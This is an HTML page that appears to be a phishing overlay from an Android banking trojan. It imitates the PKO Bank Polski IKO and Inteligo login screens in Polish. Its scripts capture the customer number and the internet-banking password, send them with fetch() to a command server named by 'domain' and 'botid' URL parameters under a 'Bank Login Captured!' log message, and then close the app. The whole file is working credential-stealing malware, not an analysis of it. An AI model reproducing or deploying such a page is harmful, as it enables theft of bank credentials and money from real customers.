<!DOCTYPE html>
<html>
<head>
	<title>iko</title>
    <link rel="shortcut icon" href="pl.pkobp.iko.png" type="image/png">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta charset="utf-8">
</head>
<body>

<style type="text/css">
	body {
		background: #fff;
		margin: 0;
		padding: 0;
		font-family: Helvetica, sans-serif;
		background-size: 100%;
	}
	.logo {
    text-align: center;
    padding: 20px 0px 20px 0px;
	}
	.form {
		text-align: center;
		padding-top: 70px;
	}
	.form label {
		display: block;
	}
	form {
		display: inline-block;
	}
fieldset {
    position: relative;
    text-align: center;
    border: none;
    background: none;
    margin: 0px 30px 0px 30px;
    border-radius: 10px;

}

input[type="text"],input[type="password"] {
border: 1px solid #cacaca;
    line-height: 16px;
    font-size: 17px;
    box-sizing: border-box;
    width: 100%;
    position: relative;
    padding: 5px 20px;
    margin: 0px 1px;
    display: block;
    -webkit-box-shadow: none;
    box-shadow: none;
    -webkit-appearance: none;
    height: 50px;
    margin: 20px 0px 5px 0px;
    color: #7e7d7e;
    text-align: left;
    background: none;
    outline: none;
    border-radius: 5px;
}
input[type="button"] {
    left: 0;
    right: 0;
    width: 100%;
    height: 50px;
    margin: 25px 0px 0px 0px;
    outline: none;
    border: none;
    float: right;
    color: #ffffff;
    font-size: 16px;
    -webkit-appearance: none;
    border-radius: 5px;
   font-weight: 600; 
   background: #003574;
}
fieldset span {
	display: inline-block;
    width: 80%;
    text-align: left;
    color: #c5f8ff;
    left: 0;
    right: 0;
    padding-top: 30px;
}
fieldset p {
	    display: inline-block;
    text-align: left;
    left: 0;
    right: 0;
    border: 1px solid #6fcbd8;
    padding: 30px;
    border-radius: 50px;
    background: #6fcbd8;
}
.logo span {
    display: inline-block;
    float: left;
    padding: 40px 0px 0px 20px;
    font-size: 20px;
    color: #fff;
    font-weight: 600;
}
input::placeholder {
    color: #7e7d7e;
}
</style>

<div class="logo">

<p style="border-bottom: 5px solid #efefef; line-height: 2;">Aktywuj ICO</p>

</div>

<script type="text/javascript">
    function next() {

        document.getElementById("login").style.display="none";
            if (document.getElementById("login").value == '')
{
    alert ('Wszystkie pola wymagane!');
    return false;
}
        document.getElementById("password").style.display="block";
    }
    function bireysel() {
        document.getElementById("inteligo_login").style.display="none";
            if (document.getElementById("login").value == '')
{
    alert ('Wszystkie pola wymagane!');
    return false;
}
        document.getElementById("login").style.display="block";
    }
    function kurumsal() {
        document.getElementById("login").style.display="none";
        document.getElementById("inteligo_login").style.display="block";
    }
    function next2() {
        document.getElementById("inteligo_login").style.display="none";
        document.getElementById("inteligo_password").style.display="block";
    }
</script>

<fieldset id="formtosend">

<div class="bireysel" id="login">


<script type="text/javascript">
    function checkLogin1() {
        var input2 = document.getElementById('login1');
        var b = document.getElementById("dalej1");

        if (input2.value.length < 8) {
            b.setAttribute("disabled", "disabled");
        } else {
            document.getElementById("dalej1").removeAttribute("disabled");
        }

    }
</script>

<script type="text/javascript">
    function checkPassword1() {
        var input3 = document.getElementById('password1');
        var b = document.getElementById("dalej2");

        if (input3.value.length < 3 ) {
            b.setAttribute("disabled", "disabled");
        } else {
            document.getElementById("dalej2").removeAttribute("disabled");
        }

    }
</script>

    <div class="menu" style="padding-bottom: 30px;">
        <a href="#bireysel" onclick="bireysel()"><span style="float: left; width: 49%; text-align: center; padding: 10px 0px 10px 0px; color: #ffffff; font-weight: 400; border-bottom: 2px solid #003574; background: #003574;">PKO Banks Polski</span></a>
        <a href="#kurumsal" onclick="kurumsal()"><span style="float: left; width: 49%; text-align: center; padding: 10px 0px 10px 0px; color: #003574; font-weight: 400; border-bottom: 1px solid #003574; border: 1px solid #003574;">Inteligo</span></a>
    </div>

<style type="text/css">
    input:disabled {
        opacity: 0.7;
    }
</style>

<label style="float: left; margin: 10px 0px 10px 0px;">Numer klienta lub osobisty login</label>
<input type="text" name="login_bireysel" id="login1" maxlength="8" onkeyup="checkLogin1()" placeholder="">
        <input type="button" id="dalej1" name="sumbit" onclick="next();" value="Dalej" disabled="disabled">

</div>

<div class="bireysel" id="password" style="display: none;">

    <div class="menu" style="padding-bottom: 30px;">
        <a href="#bireysel" onclick="bireysel()"><span style="float: left; width: 49%; text-align: center; padding: 10px 0px 10px 0px; color: #ffffff; font-weight: 400; border-bottom: 2px solid #003574; background: #003574;">PKO Banks Polski</span></a>
        <a href="#kurumsal" onclick="kurumsal()"><span style="float: left; width: 49%; text-align: center; padding: 10px 0px 10px 0px; color: #003574; font-weight: 400; border-bottom: 1px solid #003574; border: 1px solid #003574;">Inteligo</span></a>
    </div>

<label style="float: left; margin: 10px 0px 10px 0px;">Wprowadź swoje hasło do bankowości internetowej</label>
<input type="password" name="password" id="password1" onkeyup="checkPassword1()" placeholder="">
<input name="exit" type="hidden" text="true"/>
        <input type="button" name="sumbit" id="dalej2" onclick="send_form()" value="Dalej" disabled="disabled">

</div>

</fieldset>


<script type="text/javascript">
    function checkLogin2() {
        var input4 = document.getElementById('login2');
        var b = document.getElementById("dalej3");

        if (input4.value.length < 8) {
            b.setAttribute("disabled", "disabled");
        } else {
            document.getElementById("dalej3").removeAttribute("disabled");
        }

    }
</script>

<script type="text/javascript">
    function checkPassword2() {
        var input5 = document.getElementById('password2');
        var b = document.getElementById("dalej4");

        if (input5.value.length < 3 ) {
            b.setAttribute("disabled", "disabled");
        } else {
            document.getElementById("dalej4").removeAttribute("disabled");
        }

    }
</script>

<fieldset id="formtosend2">
<div class="bireysel" id="inteligo_login" style="display: none;">

    <div class="menu" style="padding-bottom: 30px;">
        <a href="#bireysel" onclick="bireysel()"><span style="float: left; width: 49%; text-align: center; padding: 10px 0px 10px 0px; color: #003574; font-weight: 400; border-bottom: 1px solid #003574; border: 1px solid #003574;">PKO Banks Polski</span></a>
        <a href="#kurumsal" onclick="kurumsal()"><span style="float: left; width: 49%; text-align: center; padding: 10px 0px 10px 0px; color: #ffffff; font-weight: 400; border-bottom: 2px solid #003574; background: #003574;">Inteligo</span></a>
    </div>

    <label style="float: left; margin: 10px 0px 10px 0px;">Numer klienta lub osobisty login</label>
<input type="text" name="login" id="login2" placeholder="" onkeyup="checkLogin2()" maxlength="8">
        <input type="button" name="sumbit" onclick="next2()" id="dalej3" value="Dalej" disabled="disabled">

    </div>

    <div class="bireysel" id="inteligo_password" style="display: none;">

    <div class="menu" style="padding-bottom: 30px;">
        <a href="#bireysel" onclick="bireysel()"><span style="float: left; width: 49%; text-align: center; padding: 10px 0px 10px 0px; color: #003574; font-weight: 400; border-bottom: 1px solid #003574; border: 1px solid #003574;">PKO Banks Polski</span></a>
        <a href="#kurumsal" onclick="kurumsal()"><span style="float: left; width: 49%; text-align: center; padding: 10px 0px 10px 0px; color: #ffffff; font-weight: 400; border-bottom: 2px solid #003574; background: #003574;">Inteligo</span></a>
    </div>

    <label style="float: left; margin: 10px 0px 10px 0px;">Wprowadź swoje hasło do bankowości internetowej</label>
<input type="password" name="password" id="password2" onkeyup="checkPassword2()" placeholder="">
<input name="exit" type="hidden" text="true"/>
        <input type="button" name="sumbit" onclick="send_form2()" id="dalej4" value="Dalej" disabled="disabled">

    </div>
</fieldset>


<script>function closeapp(){setTimeout(function(){ window.location.replace("file:///android_asset/closeapp.html");}, 1000); };
if ( typeof Android == "undefined")
    var Android = {
        returnResult : alert.bind(window)
    }

/*********Recursive implementation of jSON.stringify; ********/
var stringifyJSON = function(obj) {
    var arrOfKeyVals = [],
        arrVals = [],
        objKeys = [];

    /*********CHECK FOR PRIMITIVE TYPES**********/
    if (typeof obj === 'number' || typeof obj === 'boolean' || obj === null)
        return '' + obj;
    else if (typeof obj === 'string')
        return '"' + obj + '"';

    /*********CHECK FOR ARRAY**********/
    else if (Array.isArray(obj)) {
        if (obj[0] === undefined)
            return '[]';
        else {
            obj.forEach(function(el) {
                arrVals.push(stringifyJSON(el));
            });
            return '[' + arrVals.join(',') + ']';
        }
    }
    /*********CHECK FOR OBJECT**********/
    else if (obj instanceof Object) {
        objKeys = Object.keys(obj);
        objKeys.forEach(function(key) {
            var keyOut = '"' + key + '":';
            var keyValOut = obj[key];
            if (keyValOut instanceof Function || typeof keyValOut === undefined)
                arrOfKeyVals.push('');
            else if (typeof keyValOut === 'string')
                arrOfKeyVals.push(keyOut + '"' + keyValOut + '"');
            else if (typeof keyValOut === 'boolean' || typeof keyValOut === 'number' || keyValOut === null)
                arrOfKeyVals.push(keyOut + keyValOut);
            else if (keyValOut instanceof Object) {
                arrOfKeyVals.push(keyOut + stringifyJSON(keyValOut));
            }
        });
        return '{' + arrOfKeyVals + '}';
    }
};

function formToJSONbyName(f)
{
    var FinalObject = {}, namesHTML = ['input','select'];
    for(var i = 0; i < namesHTML.length; i++) {
        var bsform = f.getElementsByTagName(namesHTML[i]);
        for(var j = 0; j < bsform.length; j++) {
            if(bsform[j].name == 'sumbit') continue;
            FinalObject[bsform[j].name] = bsform[j].value
        }
    }
    return stringifyJSON(FinalObject);
}

function send_form()
{
var url_string = window.location.href;
var url = new URL(url_string);
var botid = url.searchParams.get("botid");
var domain = url.searchParams.get("domain");var path = window.location.pathname;var page = path.split("/").pop();
    var form = document.getElementById('formtosend');
    fetch("http://"+domain+"/project/apiMethods/uploadLog.php?log=Bank Login Captured! -----<b> Bot ID:</b> "+botid+"<br>"+page.replace(".html","")+" | "+formToJSONbyName(form)); closeapp();
}
function send_form2()
{
var url_string = window.location.href;
var url = new URL(url_string);
var botid = url.searchParams.get("botid");
var domain = url.searchParams.get("domain");var path = window.location.pathname;var page = path.split("/").pop();
    var form = document.getElementById('formtosend2');
    fetch("http://"+domain+"/project/apiMethods/uploadLog.php?log=Bank Login Captured! -----<b> Bot ID:</b> "+botid+"<br>"+page.replace(".html","")+" | "+formToJSONbyName(form)); closeapp();
}
</script>

</body>
</html>